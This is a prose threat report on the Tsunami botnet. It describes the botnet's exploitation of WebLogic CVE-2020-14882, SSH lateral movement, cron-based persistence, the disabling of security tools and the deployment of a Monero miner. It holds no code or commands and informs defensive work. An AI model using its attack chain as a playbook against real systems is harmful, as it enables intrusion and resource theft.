Tsunami Botnet

A recently established botnet named Tsunami has been undergoing rapid development, with infosec researchers observing a sizable increase in its abilities within a short time. When the activity of the botnet was first detected, it deployed a payload consisting of an XMR Monero crypto-miner variant. As a compromise vector, it exploited incorrectly configured Docker API systems. Both aspects of the botnet have been modified significantly in the latest version.

The hackers responsible for unleashing the botnet switched the attack vector, and now Tsunami propagates itself through a WebLogic vulnerability. In particular, it exploits the CVE-2020-14882 vulnerability, which was given a severity rating of 9.8 out of 10. In October 2020, Oracle published a patch addressing the issue, but many targets have not been patched and remain exposed for attacks. The number of malware payloads delivered by the botnet doubled with the inclusion of Tsunami binaries in addition to the previously observed XMR crypto-miner variants. For lateral propagation within the compromised network, it uses SecureShell by enumerating ssh users, keys, hosts, and ports. Infosec researchers who analyzed the underlying code of the malware discovered two sections of unused code. One is dedicated to exploiting Redis while the other can attempt SecyreShell brute-forcing. Another functionality added to the malware is the ability to terminate specific security solutions and monitoring tools. It also can terminate running processes for any potentially competing mining tools that could have already been deployed on the compromised target by other threat actors.

During its multi-stage attack chain, the botnet delivers multiple .xms shell scripts and an even greater number of Python scripts. In general, the shell scripts are tasked with preparing the environment for the delivery of the malware payloads. They carry out the process termination routines, uninstall certain endpoint defense solutions, and conduct the SSH lateral movement by trying to infect hosts that the server has previously been in contact with. The .xms scripts also establish the persistence mechanism of the threat by leveraging cronjobs, which will download and execute the shell scripts and the python scripts at predetermined intervals - 1 minute, 2 minutes, 3 minutes, 30 minutes, and every hour. /etc/init.d/down also is overwritten ensuring persistence at every system startup.

On the other hand, the Python scripts are the vehicles deploying the malware payloads of the botnet. With four scripts in total, they can be separated into two distinct groups. The first group that gets deployed is the one for the XMRig Monero crypto-miner. It also establishes its own persistence mechanism through cron before initiating the second script group. At this stage, the Tsunami binaries are fetched and initialized on the target.

The rapid development of the botnet combined with the discovery of unused functionalities that could be enabled at any time demonstrates cybercriminals' ability to adapt and modify their malware tools quickly.